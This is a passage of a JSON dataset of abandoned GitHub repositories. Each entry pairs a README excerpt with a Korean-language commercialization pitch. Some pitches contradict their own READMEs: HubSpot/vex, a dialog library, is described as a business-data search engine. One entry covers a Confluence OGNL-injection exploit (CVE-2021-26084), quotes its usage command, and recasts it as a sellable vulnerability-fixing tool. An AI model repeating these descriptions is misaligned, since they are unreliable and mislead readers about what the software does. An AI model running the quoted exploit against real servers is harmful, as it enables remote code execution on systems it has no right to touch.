Python\r\n\r\n[![PyPI](https://img.shields.io/pypi/v/agentpy)](https://pypi.org/project/agentpy/)\r\n[![GitHub](https://img.shields.io/github/license/joelforamitti/agentpy)](https://github.com/JoelForamitti/agentpy/blob/master/LICENSE)\r\n[![Documentation Status](https://readthedocs.org/projects/agentpy/badge/?version=latest)](https://agentpy.readthedocs.io/en/latest/?badge=latest)\r\n[![DOI](https://joss.theoj.org/papers/10.21105/joss.03065/status.svg)](https://doi.org/10.21105/joss.03065)\r\n\r\nAgentPy is an open-source library for the development and analysis of agent-based models in Python.\r\nThe framework integrates the tasks of model design, interactive simulations, numerical experiments,\r\nand data analysis within a single environment. The package is optimized for interactive computing\r\nwith [IPython](http://ipython.org/) and [Jupyter](https://jupyter.org/).\r\n\r\n**Note:** AgentPy is no longer under active development. For new projects, we recommend using [MES","composite_score":0.3201,"license_safety_tag":"safe"},{"name":"kakao/khaiii","github_url":"https://github.com/kakao/khaiii","stars":76,"language":"Python","license":"Apache-2.0","abandonment_months":9,"description":"# kakao/khaiii 상용화 분석\n\n## 왜 보물인가\n한국어 문장을 자동으로 분석하고 의미 있는 단어로 쪼개주는 기술로, 한글 텍스트를 다루는 모든 AI 서비스의 기초가 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **검색 엔진 & 추천 시스템 SaaS**: 전자상거래 플랫폼이나 콘텐츠 추천 서비스에 한국어 분석 기능을 API로 제공\n2. **기업 내부","readme_excerpt":"khaiii\n====\nkhaiii는 \"Kakao Hangul Analyzer III\"의 첫 글자들만 모아 만든 이름으로 카카오에서 개발한 세 번째 형태소분석기입니다. 두 번째 버전의 형태소분석기 이름인 dha2 (Daumkakao Hangul Analyzer 2)를 계승한 이름이기도 합니다.\n\n형태소는 언어학에서 일정한 의미가 있는 가장 작은 말의 단위로 발화체 내에서 따로 떼어낼 수 있는 것을 말합니다. 즉, 더 분석하면 뜻이 없어지는 말의 단위입니다. 형태소분석기는 단어를 보고 형태소 단위로 분리해내는 소프트웨어를 말합니다. 이러한 형태소분석은 자연어 처리의 가장 기초적인 절차로 이후 구문 분석이나 의미 분석으로 나아가기 위해 가장 먼저 이루어져야 하는 과정으로 볼 수 있습니다. (한국어 위키피디아에서 인용)\n\n\n데이터 기반\n----\n기존 버전이 사전과 규칙에 기반해 분석을 하는 데 반해 khaiii는 데이터(혹은 기계학습) 기반의 알고리즘을 이용하여 분석을 합니다. 학습에 사용한 코퍼스는 국립국어원에서 배포한 [21세기 세종계획 최종 성과물](https://ithub.korean.go.kr/user/noticeView.do?boardSeq=1&articleSeq=16)을 저희 카카오에서 오류를 수정하고 내용을 일부 추가하기도 한 것입니다.\n\n전처리 과정에서 오류가 발생하는 문장을 제외하고 약 85만 문장, 천만 어절의 코퍼스를 사용하여 학습을 했습니다. 코퍼스와 품사 체계에 대한 자세한 내용은 [코퍼스](https://github.com/kakao/khaiii/wiki/%EC%BD%94%ED%8D%BC%EC%8A%A4) 문서를 참고하시기 바랍니다.\n\n\n알고리즘\n----\n기계학습에 사용한 알고리즘은 신경망 알고리즘들 중에서 Convolutional Neural Network(CNN)을 사용하였습니다. 한국어에서 형태소분석은 자연어처리를 위한 가장 기본적인 전처리 과정이므로 속도가 매우 중요한 요소라고 생각합니다. 따라서 자연어처리에 많이 사용하는 Long-","composite_score":0.32,"license_safety_tag":"safe"},{"name":"huxq17/XRefreshView","github_url":"https://github.com/huxq17/XRefreshView","stars":6,"language":"Java","license":"unknown","abandonment_months":44,"description":"# XRefreshView 프로젝트 분석\n\n## 왜 보물인가\n모바일 앱에서 화면을 아래로 당겨서 새로운 정보를 새로고침하는 기능을 쉽게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 앱 제공 서비스**: 사용자가 화면을 당겨서 최신 기사를 받아보는 기능 구현\n2. **소셜 미디어 플랫폼**: SNS 앱에서 피드 새로고침 기능을 ","readme_excerpt":"﻿# XRefreshView\r\n\r\n### Usage\r\n----\r\n\r\n#### Gradle\r\n\r\n```groovy\r\ndependencies {\r\n   compile 'com.huxq17.xrefreshview:xrefreshview:3.6.9'\r\n   //依赖下面的库\r\n   implementation 'androidx.recyclerview:recyclerview:1.1.0'\r\n}\r\n```\r\n\r\n## 最新的使用说明请移步[我的博客](http://blog.csdn.net/footballclub/article/details/46982115 \"description\")\r\n\r\n## 效果图\r\n\r\n|松开加载更多的Recyclerview|带Banner的Recyclerview| LinearLayout样式的Recyclerview|\r\n|:-----|:-----|:-----|\r\n| <img src=\"gif/xrefresh_releasetoloadmore.gif\" width=\"280\" height=\"475\" /> | <img src=\"gif/xrefresh_banner.gif\" width=\"280\" height=\"475\" /> | <img src=\"gif/xrefresh_linearlayout.gif\" width=\"280\" height=\"475\" /> |\r\n\r\n|GridLayout样式的Recyclerview|Staggered样式的Recyclerview|\r\n|:-----|:-----|\r\n| <img src=\"gif/xrefresh_gridlayout.gif\" width=\"280\" height=\"475\" />| <img src=\"gif/xrefresh_staggeredlayout.gif\" width=\"280\" height=\"475\" />|\r\n\r\n|GridView|自定义View|笑脸刷新|\r\n|:-----|:-----|:-----|\r\n| <img src=\"gif/xrefresh_gridview.gif\" width=\"280\" height=\"475\" />| <img src=\"gif/xrefresh_","composite_score":0.3199,"license_safety_tag":"unknown"},{"name":"gorhill/uMatrix","github_url":"https://github.com/gorhill/uMatrix","stars":5,"language":"JavaScript","license":"gpl-3.0","abandonment_months":59,"description":"# uMatrix 상용화 분석\n\n## 왜 보물인가\n인터넷 사용자가 웹사이트의 어떤 데이터 요청을 차단할지 세밀하게 제어할 수 있는 프라이버시 보호 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **엔터프라이즈 보안 SaaS**: 기업의 직원 인터넷 사용을 모니터링하고 제어하는 웹 보안 게이트웨이 솔루션으로 판매\n2. **개인 프라이버시 구독 서비스**: 월별","readme_excerpt":"## uMatrix<br>[<img src=\"https://travis-ci.org/gorhill/uMatrix.svg?branch=master\" height=\"16\">](https://travis-ci.org/gorhill/uMatrix)\n\nDefinitely for advanced users.\n\n***\n\nKeep Github issues for actual bugs. User support is [/r/uMatrix](https://www.reddit.com/r/uMatrix/).\n\nForked and refactored from [HTTP Switchboard](https://github.com/gorhill/httpswitchboard).\n\nInstall [manually](https://github.com/gorhill/uMatrix/blob/master/doc/README.md) the [latest release](https://github.com/gorhill/uMatrix/releases), or install from:\n- [Firefox AMO](https://addons.mozilla.org/firefox/addon/umatrix/)\n    - To help find issues with ongoing development: [uMatrix dev build in _Releases_](https://github.com/gorhill/uMatrix/releases) (click the latest `uMatrix.webext.signed.xpi` link of the last pre-resease.)\n- [Chrome store](https://chrome.google.com/webstore/detail/µmatrix/ogfcmafjalglgifnmanfmnieipoejdcf)\n    - To help find issues with ongoing development: [uMatrix dev build in Chrome store](http","composite_score":0.3197,"license_safety_tag":"restricted"},{"name":"alienzhou/frontend-tech-list","github_url":"https://github.com/alienzhou/frontend-tech-list","stars":9,"language":"HTML","license":"unknown","abandonment_months":76,"description":"# frontend-tech-list 자산 평가\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 최신 기술과 도구들을 한곳에 정리해놓은 참고 자료로, 개발자들이 올바른 기술을 선택하는 데 도움을 줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발 교육 플랫폼**: 초보 개발자를 위한 웹 기술 학습 경로 제시 서비스\n2. **기업 기술 컨설팅**: 스","readme_excerpt":"# 前端技术清单\n\n> 最后更新：2019/10/09 [新增内容 (diff) >>](https://github.com/alienzhou/frontend-tech-list/commit/9e73eb648cb1b7413ecca0c5fe3ebb81f4dea0fe?short_path=04c6e90#diff-04c6e90faac2675aa89e2176d2eec7d8)\n\n学习文章的知识往往是碎片化的。而前端涉及到的面很广，这些知识如果不进行有效梳理，则无法相互串联、形成体系。因此，我结合工作体会将抽象出了一些前端基础能力，并将看过、写过的一些不错的文章进行整理，形成了一份（纯）前端技术清单。\n\n不论你是正在自学前端，还是对前端某些技术熟练掌握但某些还未涉足，我都希望这份清单能帮助你 review 一些前端的基础能力。\n\n- [0. 年度报告](#0-年度报告)\n- [1. 基础拾遗](#1-基础拾遗)\n  - [1.1. JavaScript](#11-javascript)\n  - [1.2. CSS](#12-css)\n  - [1.3. 浏览器](#13-浏览器)\n- [2. 工程化与工具](#2-工程化与工具)\n  - [2.1. webpack](#21-webpack)\n  - [2.2. Gulp](#22-gulp)\n  - [2.3. Linter](#23-linter)\n  - [2.4. 静态类型（Typescript/Flow）](#24-静态类型typescriptflow)\n  - [2.5. Babel](#25-babel)\n  - [2.6. CSS预处理与模块化](#26-css预处理与模块化)\n- [3. 性能优化](#3-性能优化)\n  - [3.1. 加载性能](#31-加载性能)\n  - [3.2. 运行时性能](#32-运行时性能)\n  - [3.3. 前端缓存](#33-前端缓存)\n  - [3.4. 性能调试与实践](#34-性能调试与实践)\n  - [3.5. 性能指标](#35-性能指标)\n- [4. 安全](#4-安全)\n  - [4.1. XSS](#41-xss)\n  - [4.2. CSRF](#42-csrf)\n  - [4.3. CSP](#43-csp)\n  - [4.4","composite_score":0.3197,"license_safety_tag":"unknown"},{"name":"umijs/hooks","github_url":"https://github.com/umijs/hooks","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# umijs/hooks 프로젝트 분석\n\n## 왜 보물인가\n웹사이트 개발 시 반복되는 기능들을 미리 만들어둔 라이브러리로, 개발자들의 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 관리·검색·필터링이 필요한 웹 애플리케이션 개발 시간 단축\n2. **내부 업무 도구**: 회사 직원들이 사용하는 관리 시","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://ahooks.js.org\">\n    <img width=\"200\" src=\"https://ahooks.js.org/logo.svg\">\n  </a>\n</p>\n\n<div align=\"center\">\n\nA high-quality & reliable React Hooks library.\n\n[![NPM version][image-1]][1]\n[![NPM downloads][image-2]][2]\n[![npm](https://img.shields.io/npm/dw/ahooks-v2?label=downloads%28v2%29)](https://www.npmjs.com/package/ahooks-v2)\n[![npm](https://img.shields.io/github/issues/alibaba/hooks)](https://github.com/alibaba/hooks/issues)\n[![Coverage Status](https://coveralls.io/repos/github/alibaba/hooks/badge.svg?branch=master)](https://coveralls.io/github/alibaba/hooks?branch=master)\n![gzip size](https://img.badgesize.io/https:/unpkg.com/ahooks/dist/ahooks.js?label=gzip%20size&compression=gzip)\n[![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/hooks.svg)](http://isitmaintained.com/project/alibaba/hooks \"Percentage of issues still open\")\n[![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba","composite_score":0.3196,"license_safety_tag":"safe"},{"name":"hunkim/word-rnn-tensorflow","github_url":"https://github.com/hunkim/word-rnn-tensorflow","stars":6,"language":"Python","license":"mit","abandonment_months":81,"description":"# word-rnn-tensorflow 평가\n\n## 왜 보물인가\n컴퓨터가 인간처럼 글을 자동으로 생성하는 기술의 기초가 되는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **글쓰기 보조 SaaS**: 블로그, 이메일, 광고 문구 자동 생성 서비스\n2. **콘텐츠 제작 API**: 언론사나 출판사를 위한 기사 초안 자동 작성 API 판매\n3. *","readme_excerpt":"# word-rnn-tensorflow\n[![Build Status](https://travis-ci.org/hunkim/word-rnn-tensorflow.svg?branch=master)](https://travis-ci.org/hunkim/word-rnn-tensorflow)\n\nMulti-layer Recurrent Neural Networks (LSTM, RNN) for word-level language models in Python using TensorFlow.\n\nMostly reused code from https://github.com/sherjilozair/char-rnn-tensorflow which was inspired from Andrej Karpathy's [char-rnn](https://github.com/karpathy/char-rnn).\n\n# Requirements\n- [Tensorflow 1.1.0rc0](http://www.tensorflow.org)\n\n# Basic Usage\nTo train with default parameters on the tinyshakespeare corpus, run:\n```bash\npython train.py\n```\n\nTo sample from a trained model\n```bash\npython sample.py\n```\n\nTo pick using beam search, use the `--pick` parameter. Beam search can be\nfurther customized using the `--width` parameter, which sets the number of beams\nto search with. For example:\n```bash\npython sample.py --pick 2 --width 4\n```\n\n# Sample output\n\n### Word-RNN\n```\nLEONTES:\nWhy, my Irish time?\nAnd argue in the lord; the","composite_score":0.3195,"license_safety_tag":"safe"},{"name":"MagicMashRoom/SuperCalendar","github_url":"https://github.com/MagicMashRoom/SuperCalendar","stars":7,"language":"Java","license":"unknown","abandonment_months":73,"description":"# SuperCalendar 저장소 분석\n\n## 왜 보물인가\n복잡한 일정 관리를 누구나 쉽게 할 수 있게 만든 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 SaaS**: 회사원들이 업무 일정을 함께 보고 관리하는 구독형 서비스\n2. **병원/클리닉 예약 시스템**: 의료기관에서 환자 예약과 의사 스케줄을 관리하는 내부 도구\n3. **이","readme_excerpt":"# SuperCalendar\n## ChangeLog\n* 发布1.6 稳定版\n* 发布1.5 修改了一些BUG\n* 发布1.4稳定版\n* 清除了dev污染\n* 添加手动切换上一月下一月功能\n* 解决神奇的日历尺寸问题，确保日历尺寸正确\n## 简介\n* [可能是第十好的Android开源日历](http://www.jianshu.com/p/8e3fc46e5a80)\n* 博主现在工作在一家教育公司，最近公司的产品狗扔过来一个需求，说要做一个可以周月切换的课表，可以展示用户在某一天的上课安排。接到这个任务之后我研究了很多的日历控件，并且抽出了一个calenderlib。先看一下最后的项目中的效果：\n\n<div style = \"float:center\">\n    <img src=\"http://osnftsiae.bkt.clouddn.com/syllabus_1.png\" width=\"240\">\n    <img src=\"http://osnftsiae.bkt.clouddn.com/syllabus_2.png\" width=\"240\">\n<div/>\n<div style = \"float:center\">\n    <img src=\"http://osnftsiae.bkt.clouddn.com/supercalendarexample.gif\" width=\"240\">\n<div/>\n\n* 看到本篇文章的同学估计也是实验课或者项目需求中需要一个日历表，当我接到这个需求的时候，当时脑子压根连想都没想，这么通用的控件，GitHub上一搜一大堆不是嘛。可是等到真正做起来的时候，扎心了老铁，GitHub上的大神居然异常的不给力，都是实现了基本功能，能够滑动切换月份，找实现了周月切换功能的开源库很难。终于我费尽千辛万苦找到一个能够完美切换的项目时，你周月切换之后的数据乱的一塌糊涂啊！！！\n* 算了，自己撸一个！！！\n\n## 项目链接 [SuperCalendar][Tags]\n\n[Tags]: https://github.com/MagicMashRoom/SuperCalendar\n* 如果你感觉到对你有帮助，欢迎star\n* 如果你感觉对代码有疑惑，或者需要修改的地方，欢迎issue\n\n## 主要特性\n* 日历样式完全自定义，拓展性强\n* 左","composite_score":0.3195,"license_safety_tag":"unknown"},{"name":"Microsoft/reactxp","github_url":"https://github.com/Microsoft/reactxp","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":35,"description":"# Microsoft/reactxp 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 만든 이 기술은 한 번의 코드 작성으로 웹, 모바일, 데스크톱 앱을 모두 만들 수 있어서 개발 비용과 시간을 대폭 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 여행사 예약 플랫폼을 웹과 앱으로 동시에 출시하되, 한 번의 코드 관리로 비용 절감\n","readme_excerpt":"# ReactXP\r\n\r\n[![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)](https://github.com/Microsoft/reactxp/blob/master/LICENSE) [![npm version](https://img.shields.io/npm/v/reactxp.svg?style=flat-square)](https://www.npmjs.com/package/reactxp) [![Build Status](https://dev.azure.com/ms/reactxp/_apis/build/status/Microsoft.reactxp?)](https://dev.azure.com/ms/reactxp/_build/latest?definitionId=16) [![Build Status](https://img.shields.io/travis/Microsoft/reactxp/master.svg?style=flat-square)](https://travis-ci.org/Microsoft/reactxp) [![npm downloads](https://img.shields.io/npm/dm/reactxp.svg?style=flat-square)](https://www.npmjs.com/package/reactxp) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](https://github.com/Microsoft/reactxp#contributing) [![Gitter](https://img.shields.io/gitter/room/nwjs/nw.js.svg?style=flat-square)](https://gitter.im/msreactxp/Lobby)\r\n\r\n\r\nReactXP is a library for cross-platform app devel","composite_score":0.3195,"license_safety_tag":"unknown"},{"name":"HubSpot/vex","github_url":"https://github.com/HubSpot/vex","stars":6,"language":"CSS","license":"mit","abandonment_months":39,"description":"# HubSpot/vex 분석\n\n## 왜 보물인가\nHubSpot이 만든 프로젝트로, 비즈니스 데이터를 빠르게 정렬하고 찾을 수 있는 검색 기술이 핵심입니다.\n\n## 어디에 쓸 수 있나\n1. **CRM 플랫폼**: 고객 정보 중 특정 거래처나 연락처를 초고속으로 검색하는 기능\n2. **전자상거래 관리 도구**: 수천 개의 상품 목록에서 필요한 상품을 밀리초 ","readme_excerpt":"## vex\n\n### [Demo](http://github.hubspot.com/vex/docs/welcome/) &nbsp;&nbsp; [Documentation](http://github.hubspot.com/vex/)\n\nvex is a modern dialog library which is highly configurable, easily stylable, and gets out of the way. You'll love vex because it's tiny (`5.6kb` minified and gzipped), has a clear and simple API, works on mobile devices, and can be customized to match your style in seconds.\n\n![](https://raw.github.com/HubSpot/vex/master/docs/vex.gif)\n\n### Features\n\n- Drop-in replacement for `alert`, `confirm`, and `prompt`\n- Easily configurable animations which are smooth as butter\n- Lightweight with no external dependencies\n- Looks and behaves great on mobile devices\n- Open multiple dialogs at once and close them individually or all at once\n- Built in CSS spinner for asynchronous dialogs (TODO)\n- UMD support\n\n### Documentation\n- [Getting started](/docs/intro.md)\n- [API Docs](/docs/api/1-Basic.md)\n- [Plugins](/docs/api/4-Plugins.md)\n\n[![js-standard-style](https://cdn.rawgit.com","composite_score":0.3194,"license_safety_tag":"safe"},{"name":"marcj/css-element-queries","github_url":"https://github.com/marcj/css-element-queries","stars":5,"language":"JavaScript","license":"mit","abandonment_months":32,"description":"# CSS Element Queries 분석\n\n## 왜 보물인가\n웹사이트의 각 부분이 화면 크기에 따라 자동으로 모양을 바꾸도록 해주는 기술로, 반응형 웹 디자인의 핵심 과제를 해결합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 대시보드나 보고서 작성 플랫폼에서 여러 크기의 화면에 최적화된 UI 제공\n- **내부 업무 도구**: 다양","readme_excerpt":"# CSS Element Queries\n\n\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/marcj/css-element-queries?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nElement Queries is a polyfill adding support for element based media-queries to all new browsers (incl. IE7+).\nIt allows not only to define media-queries based on window-size but also adds 'media-queries' functionality depending on element (any selector supported)\nsize while not causing performance lags due to event based implementation.\n\nIt's a proof-of-concept event-based CSS element dimension query with valid CSS selector syntax.\n\nFeatures:\n\n - no performance issues since it listens only on size changes of elements that have element query rules defined through css. Other element query polifills only listen on `window.onresize` which causes performance issues and allows only to detect changes via window.resize event and not inside layout changes like css3 animation, :hover, DOM changes etc.\n - no interval/t","composite_score":0.3193,"license_safety_tag":"safe"},{"name":"summerblue/phphub5","github_url":"https://github.com/summerblue/phphub5","stars":5,"language":"PHP","license":"unknown","abandonment_months":76,"description":"# summerblue/phphub5 기술 가치 분석\n\n## 왜 보물인가\nPHP 커뮤니티를 위한 완성도 높은 웹 플랫폼으로, 개발자들이 지식을 나누고 배우는 중심지 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 SaaS**: 프로그래밍 학습자들을 위한 월정액 온라인 학습 플랫폼으로 운영\n2. **기업 내부 도구**: IT 회사","readme_excerpt":"<p align=\"center\">\n  \n  <br>\n  <a href=\"https://laravel-china.org/topics/3383/laravel-the-first-chinese-new-book-laravel-tutorial\">\n    <img src=\"http://ww1.sinaimg.cn/large/6d86d850gw1fao8va0fv0j208y0aw74v.jpg\" width=200>\n  </a>\n</p>\n\n---\n\n![macbook](https://cloud.githubusercontent.com/assets/324764/18414545/d875e012-77ff-11e6-9249-0b56a6460cb8.png)\n\n## 项目概述\n\n* 产品名称：PHPHub5\n* 项目代码：PHPHub5\n* 官方地址：https://learnku.com\n\n[PHPHub](https://github.com/summerblue/phphub) Laravel 5.1 版本。\n\n## 运行环境\n\n- Nginx 1.8+\n- PHP 5.6+\n- Mysql 5.7+\n- Redis 3.0+\n- Memcached 1.4+\n\n## 开发环境部署/安装\n\n本项目代码使用 PHP 框架 [Laravel 5.1](https://doc.laravel-china.org/docs/5.1/) 开发，本地开发环境使用 [Laravel Homestead](https://doc.laravel-china.org/docs/5.1/homestead)。\n\n下文将在假定读者已经安装好了 Homestead 的情况下进行说明。如果您还未安装 Homestead，可以参照 [Homestead 安装与设置](https://doc.laravel-china.org/docs/5.1/homestead#installation-and-setup) 进行安装配置。\n\n### 基础安装\n\n#### 1. 克隆源代码\n\n克隆源代码到本地：\n\n    > git clone https://github.com/summerblue/phphub5.git\n\n#### 2. 配置本地的 Home","composite_score":0.3192,"license_safety_tag":"unknown"},{"name":"minishift/minishift","github_url":"https://github.com/minishift/minishift","stars":5,"language":"Go","license":"apache-2.0","abandonment_months":33,"description":"# Minishift 프로젝트 분석\n\n## 왜 보물인가\n개발자들이 자신의 컴퓨터에서 클라우드 환경을 미니어처로 만들어 테스트할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 개발사의 내부 도구**: 개발팀이 상용 서버에 배포하기 전에 자신의 노트북에서 안전하게 테스트하는 환경 제공\n2. **기업 교육 플랫폼**: IT 관리자나 개","readme_excerpt":"[[minishift]]\n= Minishift\n:icons:\n:toc: macro\n:toc-title:\n:toclevels: 1\n\ntoc::[]\n\n[[welcome-to-minishift]]\n== Welcome to Minishift!\n\nMinishift is a tool that helps you run OpenShift locally by running a\nsingle-node OpenShift cluster inside a VM. You can try out OpenShift or\ndevelop with it, day-to-day, on your local host.\n\n[NOTE]\n====\nMinishift runs OpenShift 3.x clusters. Due to different installation methods, OpenShift 4.x clusters are not supported. To run OpenShift 4.x locally, use https://github.com/code-ready/crc[CodeReady Containers].\n====\n\nMinishift uses https://github.com/docker/machine/tree/master/libmachine[libmachine] for\nprovisioning VMs, and https://github.com/openshift/origin[OpenShift Origin] for running the cluster. The code base is forked from the https://github.com/kubernetes/minikube[Minikube] project.\n\nhttps://travis-ci.org/minishift/minishift[image:https://secure.travis-ci.org/minishift/minishift.png[Build Status]]\nhttps://ci.appveyor.com/project/minishift-bot/min","composite_score":0.3191,"license_safety_tag":"safe"},{"name":"tenderlove/asmrepl","github_url":"https://github.com/tenderlove/asmrepl","stars":102,"language":"Ruby","license":"Apache-2.0","abandonment_months":16,"description":"# asmrepl 분석\n\n## 왜 보물인가\n컴퓨터가 이해하는 저수준 언어를 실시간으로 학습하고 테스트할 수 있는 대화형 환경으로, 프로그래머의 개발 속도와 학습 효율을 크게 높입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 컴퓨터 과학 온라인 강의 플랫폼에 실습 도구로 탑재해 학생들의 직관적 이해도 향상\n2. **내부 업무 도구**: 소프","readme_excerpt":"# ASMREPL\n\nThis is a REPL for assembly language.\n\n## Usage\n\nInstall the gem:\n\n```\n$ gem install asmrepl\n```\n\nThen start the repl like this:\n\n```\n$ asmrepl\n```\n\nIf you're on macOS, you'll need to start the repl with `sudo`.\n\nWhen the REPL starts, it will display all register values and flags:\n\n```\n================== CPU STATE ===================\nrax  000000000000000000  r8   0x00007f89d0f04640\nrbx  000000000000000000  r9   0x0000000000000004\nrcx  0x00007f89d0f04a50  r10  000000000000000000\nrdx  0x..fc611d3f0aa2900d4  r11  0x00000001033a4000\nrdi  0x00007ff7bd126148  r12  000000000000000000\nrsi  000000000000000000  r13  0x00007ff7bd125dc0\nrbp  0x00007ff7bd125c40  r14  000000000000000000\nrsp  0x00007ff7bd125c38  r15  000000000000000000\n\nrip     0x00000001033a4001\nrflags  0x0000000000000246\ncs      0x000000000000002b\nfs      000000000000000000\ngs      000000000000000000\n\nFLAGS: [\"PF\", \"ZF\", \"IF\"]\n\n(rip 0x00000001033a4001)>\n```\n\nThen you can issue commands and inspect register values.  Let's","composite_score":0.3191,"license_safety_tag":"safe"},{"name":"go-ego/riot","github_url":"https://github.com/go-ego/riot","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":68,"description":"# go-ego/riot 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 원하는 정보를 빠르게 찾아주는 '검색 엔진' 기술로, 대규모 데이터를 다루는 모든 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 상품 검색 기능을 강화하여 고객이 원하는 물건을 빠르게 찾을 수 있게 함\n2. **기업 내부 문서 시스템**: 직원들","readme_excerpt":"# Riot search\n\n<img align=\"right\" src=\"logo/512px.svg\" width=\"15%\"/>\n\n<!--<img align=\"right\" src=\"https://raw.githubusercontent.com/go-ego/ego/master/logo.jpg\">-->\n<!--<a href=\"https://circleci.com/gh/go-ego/ego/tree/dev\"><img src=\"https://img.shields.io/circleci/project/go-ego/ego/dev.svg\" alt=\"Build Status\"></a>-->\n[![CircleCI Status](https://circleci.com/gh/go-ego/riot.svg?style=shield)](https://circleci.com/gh/go-ego/riot)\n![Appveyor](https://ci.appveyor.com/api/projects/status/github/go-ego/riot?branch=master&svg=true)\n[![codecov](https://codecov.io/gh/go-ego/riot/branch/master/graph/badge.svg)](https://codecov.io/gh/go-ego/riot)\n[![Build Status](https://travis-ci.org/go-ego/riot.svg)](https://travis-ci.org/go-ego/riot)\n[![Go Report Card](https://goreportcard.com/badge/github.com/go-ego/riot)](https://goreportcard.com/report/github.com/go-ego/riot)\n[![GoDoc](https://godoc.org/github.com/go-ego/riot?status.svg)](https://godoc.org/github.com/go-ego/riot)\n[![GitHub release](https://i","composite_score":0.319,"license_safety_tag":"safe"},{"name":"h3v0x/CVE-2021-26084_Confluence","github_url":"https://github.com/h3v0x/CVE-2021-26084_Confluence","stars":35,"language":"Python","license":"unknown","abandonment_months":16,"description":"# CVE-2021-26084 Confluence 저장소 분석\n\n## 왜 보물인가\nConfluence(회사의 공동 작업 플랫폼)의 보안 취약점을 찾아내고 수정하는 방법을 담고 있어, 많은 기업들이 자신의 시스템을 보호하는 데 긴급하게 필요로 합니다.\n\n## 어디에 팔 수 있나\n- **SaaS 서비스**: 기업 보안 점검 자동화 도구로 판매 (월 구독형으로 ","readme_excerpt":"# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- An OGNL injection vulnerability exists that would allow an authenticated user and in some instances unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. \n\n\n### IMPORTANT\nThis exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission.\n\n\n#### • queryString param Request\n![]()![BurpRequest](https://user-images.githubusercontent.com/6265911/131630570-857df5dd-525d-43ec-9466-5c92ac9c1322.png)\n\n\n### Exploit Usage\n\n#### Commands:\n`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com `\n\n#### or\n`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x `\n\n\n\n#### • Exploitation with Confluence_O","composite_score":0.319,"license_safety_tag":"unknown"},{"name":"sivan/javascript-style-guide","github_url":"https://github.com/sivan/javascript-style-guide","stars":6,"language":"","license":"mit","abandonment_months":56,"description":"# JavaScript 스타일 가이드 (sivan/javascript-style-guide) 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 일관되게 깔끔한 코드를 작성하도록 도와주는 '규칙서'로, 팀 전체의 개발 생산성과 코드 품질을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **개발사 내부 교육 도구**: 신입 개발자들이 회사의 코","readme_excerpt":"# Airbnb JavaScript Style Guide\n\n*用更合理的方式写 JavaScript*\n\n## [《Airbnb JavaScript Style Guide 中文版》](es5/README.md)\n\n重新翻译了最常用的 ES5 版，同步更新英文版改动。\n\n---\n\n相关链接：\n\n - [Airbnb JavaScript Style Guide](https://github.com/airbnb/javascript)\n - [ES6/ES2015 版](https://github.com/yuche/javascript)\n - [React/JSX 版](https://github.com/JasonBoy/javascript/tree/master/react)\n\n-- EOF --\n","composite_score":0.3189,"license_safety_tag":"safe"},{"name":"Zehaos/MobileNet","github_url":"https://github.com/Zehaos/MobileNet","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":104,"description":"# MobileNet 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 가벼운 기기에서도 빠르게 작동하는 인공지능 기술로, 모바일 앱이나 소형 센서 기기에 인공지능을 탑재하려는 기업들에게 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스마트폰 앱 기반 이미지 인식 서비스(명함 스캔, 음식 영양 분석 등)\n- **내부 업무 도구**: 제","readme_excerpt":"# MobileNet\n\nA tensorflow implementation of Google's [MobileNets: Efficient Convolutional Neural Networks for Mobile Vision Applications](https://arxiv.org/abs/1704.04861)\n\nThe official implementation is avaliable at [tensorflow/model](https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet_v1.md).\n\nThe official implementation of object detection is now released, see [tensorflow/model/object_detection](https://github.com/tensorflow/models/tree/master/research/object_detection).\n\n# News\nYellowFin optimizer has been intergrated, but I have no gpu resources to train on imagenet with it. Call for training \\~_\\~\n\nOfficial implement [click here](https://github.com/JianGoForIt/YellowFin)\n\n## Base Module\n\n<div align=\"center\">\n<img src=\"https://github.com/Zehaos/MobileNet/blob/master/figures/dwl_pwl.png\"><br><br>\n</div>\n\n## Accuracy on ImageNet-2012 Validation Set\n\n| Model | Width Multiplier |Preprocessing  | Accuracy-Top1|Accuracy-Top5 